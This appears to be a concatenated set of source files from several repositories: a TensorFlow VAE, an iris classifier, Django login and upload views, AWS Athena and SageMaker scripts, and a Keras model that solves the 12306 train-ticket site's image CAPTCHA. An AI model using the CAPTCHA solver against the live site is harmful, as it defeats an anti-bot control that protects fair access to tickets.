# create gif
print("creating transition gif")
indices = squareToSpiral(grid_size)
load = [load[i].numpy() for i in indices]
kargs = {'duration': 0.01}
imageio.mimsave(os.path.abspath(os.path.dirname(os.getcwd()))+"/img/"+nameFile+".gif",load, **kargs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--out", type=str, default="test",
help="file name of output png <default: 'test'>")
parser.add_argument("--im-dim", type=int, default=28,
help="square dimensions on which to remap images <default: 28>")
parser.add_argument("--grid-size", type=int, default=40,
help="square dimensions or sensitivity of grid plot <default: 40>")
parser.add_argument("--latent-range", type=float, default=3,
help="range on which to search manifold mean <default: 3>")
parser.add_argument("--std", type=float, default=0.01,
help="standard deviation of latent distribution <default: 0.01>")
parser.add_argument("--num-samples", type=int, default=50,
help="number of averaging samples per plot cell <defaults: 50>")
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument('-p', '--pickle', type=str,
help="name of directory where cvae weights are stored",
required=True)
args = parser.parse_args()
plotManifold_CVAE(args.pickle,args.out,args.im_dim,args.grid_size,args.latent_range,args.std,args.num_samples)
```
#### File: src/obj/CVAE.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import numpy as np
class CVAE(tf.keras.Model):
"""
Convolutional Variational Autoencoder (VAE)
sub-class of tf.keras.Model
code modified from TF2 CVAE tutorial:
https://www.tensorflow.org/alpha/tutorials/generative/cvae
"""
def __init__(self, latent_dim, epochs = 5, batch_size = 50, learning_rate = 0.001,
im_dim = 28, n_filters = 32):
""" initialize model layers and parameters """
super(CVAE, self).__init__()
self.epochs = epochs
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer = tf.keras.optimizers.Adam(self.learning_rate)
self.latent_dim = latent_dim
self.im_dim = im_dim
self.n_filters = n_filters
self.inference_net = tf.keras.Sequential(
[
tf.keras.layers.InputLayer(input_shape=(int(self.im_dim), int(self.im_dim), 1)),
tf.keras.layers.Conv2D(
filters=int(self.n_filters), kernel_size=3, strides=(2, 2), activation='relu'),
tf.keras.layers.Flatten(),
# No activation
tf.keras.layers.Dense(latent_dim + latent_dim),
])
self.generative_net = tf.keras.Sequential(
[
tf.keras.layers.InputLayer(input_shape=(latent_dim,)),
tf.keras.layers.Dense(units=(int((self.im_dim/2)**2)*self.n_filters), activation=tf.nn.relu),
tf.keras.layers.Reshape(target_shape=(int(self.im_dim/2), int((self.im_dim/2)), self.n_filters)),
tf.keras.layers.Conv2DTranspose(
filters=int(self.n_filters),
kernel_size=3,
strides=(2, 2),
padding="SAME",
activation='relu'),
# No activation
tf.keras.layers.Conv2DTranspose(
filters=1, kernel_size=3, strides=(1, 1), padding="SAME"),
])
# @tf.function
def encode(self, x):
""" encode input data into log-normal distribution at latent layer """
mean, logvar = tf.split(self.inference_net(x), num_or_size_splits=2, axis=1)
return mean, logvar
def reparameterize(self, mean, logvar):
""" reparameterize normal distribution from learned mean/variance """
eps = tf.random.normal(shape=mean.shape)
return eps * tf.exp(logvar * .5) + mean
# @tf.function
def decode(self, z, apply_sigmoid=False):
""" decode latent variables into visible samples """
logits = self.generative_net(z)
if apply_sigmoid:
probs = tf.sigmoid(logits)
return probs
else:
return logits
def log_normal_pdf(self, sample, mean, logvar, raxis=1):
""" function for defining log normal PDF """
log2pi = tf.math.log(2. * np.pi)
return tf.reduce_sum(-.5 * ((sample - mean) ** 2. * tf.exp(-logvar) + logvar + log2pi),
axis=raxis)
def compute_loss(self, x):
""" compute ELBO loss given hyperparamters """
mean, logvar = self.encode(x)
z = self.reparameterize(mean, logvar)
x_logit = self.decode(z)
cross_ent = tf.nn.sigmoid_cross_entropy_with_logits(logits=x_logit, labels=x)
logpx_z = -tf.reduce_sum(cross_ent, axis=[1, 2, 3])
logpz = self.log_normal_pdf(z, 0., 0.)
logqz_x = self.log_normal_pdf(z, mean, logvar)
return -tf.reduce_mean(logpx_z + logpz - logqz_x)
def compute_gradients(self, x):
""" compute gradient given ELBO loss """
with tf.GradientTape() as tape:
loss = self.compute_loss(x)
return tape.gradient(loss, self.trainable_variables), loss
def apply_gradients(self, gradients):
""" apply adam gradient descent optimizer for learning process """
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
def train(self, train_dataset):
""" main training call for CVAE """
num_samples = int(train_dataset.shape[0]/self.batch_size)
train_dataset = tf.data.Dataset.from_tensor_slices(train_dataset).shuffle(train_dataset.shape[0]).batch(self.batch_size)
for i in range(self.epochs):
j = 1
norm = 0
Loss = 0
print("Epoch: %s" % str(i+1))
for train_x in train_dataset:
gradients, loss = self.compute_gradients(train_x)
Loss += loss
norm += tf.reduce_mean([tf.norm(g) for g in gradients])
self.apply_gradients(gradients)
if j != 1 and j % 20 == 0:
# good to print out euclidean norm of gradients
tf.print("Epoch: %s, Batch: %s/%s" % (i+1,j,num_samples))
tf.print("Mean-Loss: ", Loss/j, ", Mean gradient-norm: ", norm/j)
j += 1
def sample(self, eps=None, num = 50):
""" sample latent layer and decode to generated visible """
if eps is None:
eps = tf.random.normal(shape=(num, self.latent_dim))
return self.decode(eps, apply_sigmoid=True)
``` |
{
"source": "1514louluo/influx-proxy",
"score": 3
} |
#### File: influx-proxy/influx-test/mytime.py
```python
import time
class mytime:
def fz(self, x):
# front zero
if x / 10 >= 1:
return str(x)
else:
return '0'+str(x)
def __init__(self, Y, M, D, h, m, s, ms=0, us=0, ns=0):
self.format_time = str(Y) + '-' + self.fz(M) + '-' + self.fz(D) + ' ' + \
self.fz(h) + ':' + self.fz(m) + ':' + self.fz(s)
self.format = '%Y-%m-%d %X'
self.struct_time = time.strptime(self.format_time, self.format)
self.timestamp = int(time.mktime(self.struct_time))
self.ms = ms
self.us = us
self.ns = ns
def t_h(self):
return self.timestamp / 3600
def t_m(self):
return self.timestamp / 60
def t_s(self):
return self.timestamp
def t_ms(self):
return self.timestamp * 1000 + self.ms
def t_us(self):
return self.timestamp * 1000000 + self.us
def t_ns(self):
return self.timestamp * 1000000000 + self.ns
def after(self, sec):
# offer a fake time
# just ensure its timestamp to be correct
a = mytime(2000,1,1,1,1,1, self.ms, self.us, self.ns)
a.timestamp = self.timestamp + sec
return a
def t_p(self, precision):
td = {
'h': self.t_h(),
'm': self.t_m(),
's': self.t_s(),
'ms': self.t_ms(),
'us': self.t_us(),
'ns': self.t_ns(),
}
return td[precision]
``` |
{
"source": "1520098156/iris_classifying",
"score": 3
} |
#### File: 1520098156/iris_classifying/iris_NN.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# 损失函数
def loss_function(a, y):
return -(y * np.log(a) + (1 - y) * np.log(1 - a))
class iris_NN:
def __init__(self, iris_data):
self.lr = 0.1 # learning rate
self.iris_data = iris_data
X = np.array(self.iris_data[0:, 0:4])
y = np.array([self.iris_data[0:, 4]])
y = y.T
X = X / 8 * 0.99 + 0.01 # 归一化
X_train, X_test, self.y_train, self.y_test = train_test_split(X, y)
self.X_train = X_train.T
self.X_test = X_test.T
oneHot = np.identity(3)
for i in range(oneHot.shape[0]):
for j in range(oneHot.shape[1]):
if oneHot[i, j] == 1:
oneHot[i, j] = 0.99
else:
oneHot[i, j] = 0.01
y_true = oneHot[self.y_train.T.astype(int)][0]
self.y_true = y_true.T
self.a2 = np.zeros((3, 38))
self.W1 = np.random.normal(0.0, 1, (8, 4))
self.W2 = np.random.normal(0.0, 1, (3, 8))
self.B1 = np.zeros((8, 1))
self.B2 = np.zeros((3, 1))
def train(self):
W1 = np.random.normal(0.0, 1, (8, 4))
W2 = np.random.normal(0.0, 1, (3, 8))
B1 = np.zeros((8, 1))
B2 = np.zeros((3, 1))
for epoch in range(5000):
out1 = np.dot(W1, self.X_train) + B1
act1 = sigmoid(out1)
out2 = np.dot(W2, act1) + B2
act2 = sigmoid(out2)
dZ2 = act2 - self.y_true
dW2 = 1 / 112 * np.dot(dZ2, act1.T)
dB2 = 1 / 112 * np.sum(dW2, axis=1, keepdims=True)
dZ1 = np.dot(W2.T, dZ2) * (act1 * (1 - act1))
dW1 = 1 / 112 * np.dot(dZ1, self.X_train.T)
dB1 = 1 / 112 * np.sum(dZ1, axis=1, keepdims=True)
W2 -= self.lr * dW2
B2 -= self.lr * dB2
W1 -= self.lr * dW1
B1 -= self.lr * dB1
# 每两百次输出一侧损失函数
# if epoch % 200 == 0:
# print(np.sum(loss_function(act2, self.y_true)))
self.W2 = W2
self.B2 = B2
self.W1 = W1
self.B1 = B1
def test(self):
result = []
o1 = np.dot(self.W1, self.X_test) + self.B1
a1 = sigmoid(o1)
o2 = np.dot(self.W2, a1) + self.B2
a2 = sigmoid(o2)
for i in range(a2.T.shape[0]):
result.append(np.argmax(a2.T[i]))
true_no = 0
for i in range(len(result)):
if result[i] == self.y_test[i][0]:
true_no += 1
print('Correct rate =', true_no / len(result) * 100, '%')
def predict(self, X_predict):
result = []
out1 = np.dot(self.W1, X_predict) + self.B1
act1 = sigmoid(out1)
out2 = np.dot(self.W2, act1) + self.B2
act2 = sigmoid(out2)
for i in range(act2.T.shape[0]):
result.append(np.argmax(act2.T[i]))
result = np.array([result])
print('Prediction is:')
print(result)
print('\'0\' means setosa\n\'1\' means versicolor\n\'2\' means virginica')
``` |
{
"source": "15207135348/Java12306",
"score": 2
} |
#### File: python/vertifyimage/main.py
```python
import base64
from keras import models
import tensorflow as tf
import os
import cv2
import numpy as np
import scipy.fftpack
graph = tf.get_default_graph()
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
TEXT_MODEL = ""
IMG_MODEL = ""
def pretreatment_get_text(img, offset=0):
# 得到图像中的文本部分
return img[3:22, 120 + offset:177 + offset]
def phash(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1)
im = im[:8, :8]
med = np.median(im)
im = im > med
im = np.packbits(im)
return im
def _get_imgs(img):
interval = 5
length = 67
for x in range(40, img.shape[0] - length, interval + length):
for y in range(interval, img.shape[1] - length, interval + length):
yield img[x:x + length, y:y + length]
def get_imgs(img):
imgs = []
for img in _get_imgs(img):
imgs.append(phash(img))
return imgs
def get_text(img, offset=0):
text = pretreatment_get_text(img, offset)
text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY)
text = text / 255.0
h, w = text.shape
text.shape = (1, h, w, 1)
return text
def base64_to_image(base64_code):
# base64解码
img_data = base64.b64decode(base64_code)
# 转换为np数组
img_array = np.fromstring(img_data, np.uint8)
# 转换成opencv可用格式
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
return img
def preprocess_input(x):
x = x.astype('float32')
# 我是用cv2来读取的图片,其已经是BGR格式了
mean = [103.939, 116.779, 123.68]
x -= mean
return x
def code_xy(Ofset=None, is_raw_input=True):
"""
获取验证码
:return: str
"""
if is_raw_input:
print(u"""
*****************
| 1 | 2 | 3 | 4 |
*****************
| 5 | 6 | 7 | 8 |
*****************
""")
print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格")
print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True")
print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件")
Ofset = input(u"输入对应的验证码: ")
if isinstance(Ofset, list):
select = Ofset
else:
Ofset = Ofset.replace(",", ",")
select = Ofset.split(',')
post = []
offsetsX = 0 # 选择的答案的left值,通过浏览器点击8个小图的中点得到的,这样基本没问题
offsetsY = 0 # 选择的答案的top值
for ofset in select:
if ofset == '1':
offsetsY = 77
offsetsX = 40
elif ofset == '2':
offsetsY = 77
offsetsX = 112
elif ofset == '3':
offsetsY = 77
offsetsX = 184
elif ofset == '4':
offsetsY = 77
offsetsX = 256
elif ofset == '5':
offsetsY = 149
offsetsX = 40
elif ofset == '6':
offsetsY = 149
offsetsX = 112
elif ofset == '7':
offsetsY = 149
offsetsX = 184
elif ofset == '8':
offsetsY = 149
offsetsX = 256
else:
pass
post.append(offsetsX)
post.append(offsetsY)
randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '')
print(u"验证码识别坐标为{0}".format(randCode))
return randCode
class Verify:
def __init__(self):
self.textModel = ""
self.imgModel = ""
self.loadImgModel()
self.loadTextModel()
def loadTextModel(self):
if not self.textModel:
self.textModel = models.load_model(PATH('model.v2.0.h5'))
else:
print("无需加载模型model.v2.0.h5")
def loadImgModel(self):
if not self.imgModel:
self.imgModel = models.load_model(PATH('12306.image.model.h5'))
def verify(self, fn):
verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺',
'海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅',
'电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮',
'菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟',
'刺绣',
'铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴',
'薯条',
'蜜蜂', '日历', '口哨']
# 读取并预处理验证码
img = base64_to_image(fn)
text = get_text(img)
imgs = np.array(list(_get_imgs(img)))
imgs = preprocess_input(imgs)
text_list = []
# 识别文字
self.loadTextModel()
global graph
with graph.as_default():
label = self.textModel.predict(text)
label = label.argmax()
text = verify_titles[label]
text_list.append(text)
# 获取下一个词
# 根据第一个词的长度来定位第二个词的位置
if len(text) == 1:
offset = 27
elif len(text) == 2:
offset = 47
else:
offset = 60
text = get_text(img, offset=offset)
if text.mean() < 0.95:
with graph.as_default():
label = self.textModel.predict(text)
label = label.argmax()
text = verify_titles[label]
text_list.append(text)
print("题目为{}".format(text_list))
# 加载图片分类器
self.loadImgModel()
with graph.as_default():
labels = self.imgModel.predict(imgs)
labels = labels.argmax(axis=1)
results = []
for pos, label in enumerate(labels):
l = verify_titles[label]
print(pos + 1, l)
if l in text_list:
results.append(str(pos + 1))
return results
``` |
{
"source": "15281029/privacyinfo",
"score": 2
} |
#### File: privacyinfo/pinfo/views.py
```python
from django.shortcuts import render
from django.contrib.auth.hashers import make_password, check_password
from django.http import HttpResponse
from django.http import request
from pinfo import models
def register(request):
if request.method == 'POST':
username = request.POST.get('username')
email = request.POST.get('email')
phone = request.POST.get('phone')
password = request.POST.get('password')
user = models.UserModel.objects.filter(username=username)
eml = models.UserModel.objects.filter(email=email)
if user:
return render(request, 'registererr.html', {'errinfo': '用户名已经存在'})
elif eml:
return render(request, 'registererr.html', {'errinfo': '邮箱已被注册'})
else:
newuser = models.UserModel.objects.create(
username=username, phone=phone, password=make_password(password), email=email)
newuser.save()
return render(request, "register.html")
def login(request):
if request.method == 'POST':
logininfo = request.POST.get('logininfo')
password = request.POST.get('password')
try:
linfo = models.UserModel.objects.get(username=logininfo)
pwd = linfo.password
if check_password(password, pwd):
return HttpResponse('OK')
except Exception:
try:
linfo = models.UserModel.objects.get(email=logininfo)
pwd = linfo.password
if check_password(password, pwd):
return HttpResponse('OK')
except Exception:
return render(request, "loginerr.html")
return render(request, "login.html")
``` |
{
"source": "15281029/PyCache",
"score": 3
} |
#### File: PyCache/tests/test.py
```python
import time
from iCache.iCache import Cache
cache = Cache(maxsize=255, ttl=5) # 设置全局 ttl缓存有效期 5s
# 手动建立单值缓存 并设置单指有效期,覆盖全局设置,仅对该值有效
cache.set(1, 'foo', ttl=3)
cache.set(2, 'bar')
# 得到该值的所有信息,包括 value 值 ttl 有效期 time 保存时间
print(cache.get_all(1))
# 仅得到值
print(cache.get_value(1))
# 支持装饰器函数自动保存函数返回值 并设置有效期 1s
@cache.cache(ttl=1)
def func(a, b):
return a+b
func(1, 3)
# 查看所有缓存信息
cache.view_cache()
# 得到函数缓存值
print(cache.get_value(func))
# 查看当前缓存是否有效
print(cache.is_effective(func))
time.sleep(2) # 延时 2s
# 确定缓存结果是否有效
print(cache.is_effective(func))
# 利用下标快速访问缓存元素
print(cache[func])
# 计算当前缓存大小
print(len(cache))
cache.delete(para='invalid')
cache.view_cache()
# 将缓存转储为 json
# print(cache.dump())
``` |
{
"source": "1535315854/Awesome-semantic-segmentation-pytorch",
"score": 3
} |
#### File: 1535315854/Awesome-semantic-segmentation-pytorch/demo.py
```python
import os
import argparse
import torch
from torchvision import transforms
from PIL import Image
from utils.visualize import get_color_pallete
from models import get_model
parser = argparse.ArgumentParser(
description='Predict segmentation result from a given image')
parser.add_argument('--model', type=str, default='fcn32s_vgg16_voc',
help='model name (default: fcn32_vgg16)')
parser.add_argument('--dataset', type=str, default='pascal_aug', choices=['pascal_voc/pascal_aug/ade20k/citys'],
help='dataset name (default: pascal_voc)')
parser.add_argument('--save-folder', default='~/.torch/models',
help='Directory for saving checkpoint models')
parser.add_argument('--input-pic', type=str, default='./datasets/VOCdevkit/VOC2012/JPEGImages/2007_000032.jpg',
help='path to the input picture')
parser.add_argument('--outdir', default='./eval', type=str,
help='path to save the predict result')
args = parser.parse_args()
def demo(config):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# output folder
if not os.path.exists(config.outdir):
os.makedirs(config.outdir)
# image transform
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
image = Image.open(config.input_pic).convert('RGB')
images = transform(image).unsqueeze(0).to(device)
model = get_model(args.model, pretrained=True, root=args.save_folder).to(device)
print('Finished loading model!')
model.eval()
with torch.no_grad():
output = model(images)
pred = torch.argmax(output[0], 1).squeeze(0).cpu().data.numpy()
mask = get_color_pallete(pred, args.dataset)
outname = os.path.splitext(os.path.split(args.input_pic)[-1])[0] + '.png'
mask.save(os.path.join(args.outdir, outname))
if __name__ == '__main__':
demo(args)
``` |
{
"source": "15354333388/haxizhijiao",
"score": 3
} |
#### File: haxizhijiao/hzxi/haxi_file.py
```python
import os
from . import haxi_timechange
from haxizhijiao import settings
class File_Operation(object):
@staticmethod
def save_file(file, static_url=settings.MEDIA_ROOT): # 保存文件在本地
save_time = haxi_timechange.ChangeTime.change_time_to_date("%Y%m%d%H%M%S")
fname = os.path.join(static_url, save_time + file.name)
while True:
if os.path.exists(fname):
save_time = haxi_timechange.ChangeTime.change_time_to_date("%Y%m%d%H%M%S")
fname = os.path.join(static_url, save_time + file.name)
else:
break
image_url = save_time + file.name
try:
with open(fname, 'wb') as pic:
for c in file.chunks():
pic.write(c)
except:
if os.path.exists(fname):
os.remove(fname)
return None # when create new file failed, return None
return image_url
```
#### File: haxizhijiao/hzxi/haxi_maneouvre_middle.py
```python
import os
from django.db import transaction
from . import models
from . import database_operation
from . import database
from . import haxi_qiniuyun
from . import haxi_file
from haxizhijiao import settings
from .haxi_error import SaveLocalError, SaveQiniuyunError
from . import haxi_timechange
class ManeouvreMiddle(object):
@staticmethod
def get_maneouvre_middle(limit=1, skip=0, desc='-ym_id', fields=[], contions={}):
fields = fields if fields else database.manoeuvre_middle_fields
queryset = database_operation.DatabaseOperation(models.ManoeuverMiddle).find(fields=fields, contions=contions, limit=limit, skip=skip, desc=desc)
if not queryset:
return None
data = []
for query in queryset:
query['ym_user'] = models.User.objects.filter(u_id=query['ym_user'])
query['ym_maneouvre'] = models.Manoeuvre.objects.filter(y_id=query['ym_maneouvre'])
data.append(query)
return data
@staticmethod
def create_middle_manoeuvre(body, data, text=None):
# 核实id
if not (models.ManoeuverMiddle.objects.filter(ym_user__u_id=body['u_id'], ym_manoeuvre__y_id=body['y_id'])):
return 'bad request'
# 取出文件
success_url = list()
response_url = list()
try:
with transaction.atomic():
for name in ['image', 'video', 'files']:
files_url = list()
files_data = list()
for i in range(1, 11):
if not data.get(name+str(i)):
break
files_data.append(data.get(name+str(i)))
# 传出七牛云函数进行储存
if files_data:
for file_data in files_data:
for _ in range(3): # 保存3次超过三次宣告失败,返回
relative_url = haxi_file.File_Operation.save_file(file_data)
if relative_url:
break
if _ == 2:
raise SaveLocalError('%s保存到本地失败' % file_data.name)
absolute_url = os.path.join(settings.MEDIA_ROOT, relative_url) # 文件相对路径
haxi_qiniuyun.Qiniuyun.save_qiniuyun(relative_url, absolute_url) # 文件绝对路径
files_url.append('http://pksdg2zat.bkt.clouddn.com' + '/' + absolute_url)
success_url.append(absolute_url)
response_url.append('http://pksdg2zat.bkt.clouddn.com' + '/' + relative_url)
for t in range(3):
retDate, infoDate = haxi_qiniuyun.Qiniuyun.save_qiniuyun(relative_url, absolute_url)
# if retDate:
# break
# if t == 2:
# os.remove(absolute_url)
# raise SaveQiniuyunError('%s保存到七牛云失败' % file_data.name)
os.remove(absolute_url) # 删除本地文件
# 保存url到数据库
models.ManoeuverMiddle.objects.filter(ym_manoeuvre__y_id=body['y_id'], ym_user__u_id=body['u_id']).update(**{'ym_{name}_url'.format(name=name): ' '.join(files_url)})
query = models.ManoeuverMiddle.objects.filter(ym_manoeuvre__y_id=body['y_id'], ym_user__u_id=body['u_id'])
query.update(ym_finishedtime=haxi_timechange.ChangeTime.change_time_to_date("%Y-%m-%d %H:%M:%S"), ym_finished=True)
models.Incident.objects.filter(i_symbol=body['y_id'], i_table='manoeuvre').\
update(i_symbol=body['y_id'], i_table='manoeuvre', i_endtime=haxi_timechange.ChangeTime.change_time_to_date("%Y-%m-%d %H:%M:%S"))
if text:
query.update(ym_answer=text)
except SaveLocalError as e:
for successed in success_url:
haxi_qiniuyun.Qiniuyun.delete_qiniuyun(successed)
return e
except SaveQiniuyunError as e:
for successed in success_url:
haxi_qiniuyun.Qiniuyun.delete_qiniuyun(successed)
return e
return response_url
# return fail_files
# ym_score = models.IntegerField(null=True)
# ym_timeremaining = models.IntegerField()
# ym_result = models.CharField(max_length=256, null=True)
# ym_createtime = models.DateTimeField(auto_now_add=True)
# ym_changetime = models.DateTimeField(auto_now=True)
# ym_finished = models.BooleanField(default=False)
# ym_finishedtime = models.DateTimeField(null=True
```
#### File: haxizhijiao/hzxi/permissions.py
```python
import json
from rest_framework import status
from django.shortcuts import render, redirect
from django.http import HttpResponse,JsonResponse
from . import models
from . import database
def is_login(func):
def wapper(request, *args, **kwargs):
if request.COOKIES.get('is_login', False):
u_pid = request.session.get('pid', '')
query = models.User.objects.filter(u_pid=u_pid)
if query and len(query) == 1:
return func(request, *args, **kwargs)
else:
return redirect('/hzxi/index/')
else:
return redirect('/hzxi/index/')
return wapper
def verify_permissions(func):
def wapper(request, *args, **kwargs):
func(request, *args, **kwargs)
return wapper
def is_ajax(func):
def wapper(request, *args, **kwargs):
if not request.is_ajax():
data = database.data
data['status'] = 'error'
data['msg'] = 'only receive ajax request'
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
return func(request, *args, **kwargs)
return wapper
def is_same(func):
def wapper(request, *args, **kwargs):
data = database.data
data['status'] = 'error'
data['msg'] = 'session is not same request, please login again'
if request.method == 'GET':
if not (json.loads(request.GET.get('u_pid')) if request.GET.get('u_pid') else None == request.session['pid']):
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
elif not request.body.get('u_pid') == request.session['pid']:
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
print('ok------------------', request.path, request.method)
return func(request, *args, **kwargs)
return wapper
```
#### File: haxizhijiao/hzxi/qiniyuntest.py
```python
import os
import time
from django.http import JsonResponse
from django.shortcuts import render
from qiniu import Auth, put_file, etag
from . import models
from haxizhijiao import settings
def save_image(file, static_url=settings.MEDIA_ROOT):
def get_save_time(): # create time to save file
timeStamp = time.time()
timeArray = time.localtime(timeStamp)
otherStyleTime = time.strftime("%Y%m%d%H%M%S", timeArray)
return otherStyleTime
save_time = get_save_time()
fname = os.path.join(static_url, save_time+file.name)
while True:
if os.path.exists(fname):
save_time = get_save_time()
fname = os.path.join(static_url, save_time+file.name)
else:
break
image_url = save_time+file.name
try:
with open(fname, 'wb') as pic:
for c in file.chunks():
pic.write(c)
except:
os.remove(fname) if os.path.exists(fname) else None
return None # when create new file failed, return None
# image size operation
# im = Image.open(fname)
# out = im.resize((128, 128), Image.ANTIALIAS)
# out.save(fname, 'jpeg')
return image_url
def ceshi(request):
return render(request, 'chuanm.html')
def parseRet(retData, respInfo):
if retData != None:
print("Upload file success!")
print("Hash: " + retData["hash"])
print("Key: " + retData["key"])
# 检查扩展参数
for k, v in retData.items():
if k[:2] == "x:":
print(k + ":" + v)
# 检查其他参数
for k, v in retData.items():
if k[:2] == "x:" or k == "hash" or k == "key":
continue
else:
print(k + ":" + str(v))
else:
print("Upload file failed!")
print("Error: " + respInfo.text_body)
def upload(request):
if request.method == 'POST':
# name = request.POST.get('username')
data = []
resp = []
for i in range(1,11):
name = 'img{0}'.format(i)
avatar = request.FILES.get(name)
if not avatar:
return JsonResponse({'msg': resp})
root = save_image(avatar) # 文件的相对路径
if root:
localfile = os.path.join(settings.MEDIA_ROOT, root)
data.append(root)
uuid = root
models.Userp.objects.create(avatar=root)
access_key = "<KEY>"
secret_key = "<KEY>"
bucket_name = 'zhijiao'
q = Auth(access_key, secret_key)
print(root)
key = root
print(key)
policy = {
'callbackUrl': 'pksdg2zat.bkt.clouddn.com',
'callbackBody': 'filename=$(fname)&filesize=$(fsize)'
}
token = q.upload_token(bucket_name, key, 3600, policy)
# localfile = './static/uploads/avatar/%s' % avatar
retDate, infoDate = put_file(token, key, localfile)
print(root)
print(localfile)
parseRet(retDate, infoDate)
# os.remove(localfile)
resp.append({
'url': 'http://pksdg2zat.bkt.clouddn.com' + '/' + root
})
return JsonResponse(data={'msg': 'OK'})
# return render(request, 'upload.html')
# STATIC_URL = '/static/'
#
# MEDIA_ROOT = os.path.join(BASE_DIR, 'static/uploads')
#
# STATICFILES_DIRS = [
# os.path.join(BASE_DIR, 'static'),
# ]
``` |
{
"source": "15379180/pipelines",
"score": 2
} |
#### File: query/src/query.py
```python
import argparse
import json
import logging
import time
import re
import boto3
def get_client(region=None):
"""Builds a client to the AWS Athena API."""
client = boto3.client('athena', region_name=region)
return client
def query(client, query, database, output):
response = client.start_query_execution(
QueryString=query,
QueryExecutionContext={
'Database': database
},
ResultConfiguration={
'OutputLocation': output,
}
)
execution_id = response['QueryExecutionId']
logging.info('Execution ID: %s', execution_id)
# Athena query is aync call, we need to fetch results and wait for execution
state = 'RUNNING'
max_execution = 5 # TODO: this should be an optional parameter from users. or use timeout
while (max_execution > 0 and state in ['RUNNING']):
max_execution = max_execution - 1
response = client.get_query_execution(QueryExecutionId = execution_id)
if 'QueryExecution' in response and \
'Status' in response['QueryExecution'] and \
'State' in response['QueryExecution']['Status']:
state = response['QueryExecution']['Status']['State']
if state == 'FAILED':
raise Exception('Athena Query Failed')
elif state == 'SUCCEEDED':
s3_path = response['QueryExecution']['ResultConfiguration']['OutputLocation']
# could be multiple files?
filename = re.findall('.*\/(.*)', s3_path)[0]
logging.info("S3 output file name %s", filename)
break
time.sleep(5)
# TODO:(@Jeffwan) Add more details.
result = {
'total_bytes_processed': response['QueryExecution']['Statistics']['DataScannedInBytes'],
'filename': filename
}
return result
def main():
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--region', type=str, help='Athena region.')
parser.add_argument('--database', type=str, required=True, help='The name of the database.')
parser.add_argument('--query', type=str, required=True, help='The SQL query statements to be executed in Athena.')
parser.add_argument('--output', type=str, required=False,
help='The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/')
args = parser.parse_args()
client = get_client(args.region)
results = query(client, args.query, args.database, args.output)
results['output'] = args.output
logging.info('Athena results: %s', results)
with open('/output.txt', 'w+') as f:
json.dump(results, f)
if __name__ == '__main__':
main()
```
#### File: aws/sagemaker/run_tests.py
```python
import os
import sys
import unittest
# Taken from http://stackoverflow.com/a/17004263/2931197
def load_and_run_tests():
setup_file = sys.modules['__main__'].__file__
setup_dir = os.path.abspath(os.path.dirname(setup_file))
test_loader = unittest.defaultTestLoader
test_runner = unittest.TextTestRunner()
test_suite = test_loader.discover(setup_dir, pattern="test_*.py")
test_runner.run(test_suite)
if __name__ == '__main__':
load_and_run_tests()
```
#### File: train/src/train.py
```python
import argparse
import logging
from common import _utils
def create_parser():
parser = argparse.ArgumentParser(description='SageMaker Training Job')
_utils.add_default_client_arguments(parser)
parser.add_argument('--job_name', type=str.strip, required=False, help='The name of the training job.', default='')
parser.add_argument('--role', type=str.strip, required=True, help='The Amazon Resource Name (ARN) that Amazon SageMaker assumes to perform tasks on your behalf.')
parser.add_argument('--image', type=str.strip, required=True, help='The registry path of the Docker image that contains the training algorithm.', default='')
parser.add_argument('--algorithm_name', type=str.strip, required=False, help='The name of the resource algorithm to use for the training job.', default='')
parser.add_argument('--metric_definitions', type=_utils.str_to_json_dict, required=False, help='The dictionary of name-regex pairs specify the metrics that the algorithm emits.', default='{}')
parser.add_argument('--training_input_mode', choices=['File', 'Pipe'], type=str.strip, help='The input mode that the algorithm supports. File or Pipe.', default='File')
parser.add_argument('--hyperparameters', type=_utils.str_to_json_dict, help='Dictionary of hyperparameters for the the algorithm.', default='{}')
parser.add_argument('--channels', type=_utils.str_to_json_list, required=True, help='A list of dicts specifying the input channels. Must have at least one.')
parser.add_argument('--data_location_1', type=str.strip, required=False, help='The S3 URI of the input data source for channel 1.', default='')
parser.add_argument('--data_location_2', type=str.strip, required=False, help='The S3 URI of the input data source for channel 2.', default='')
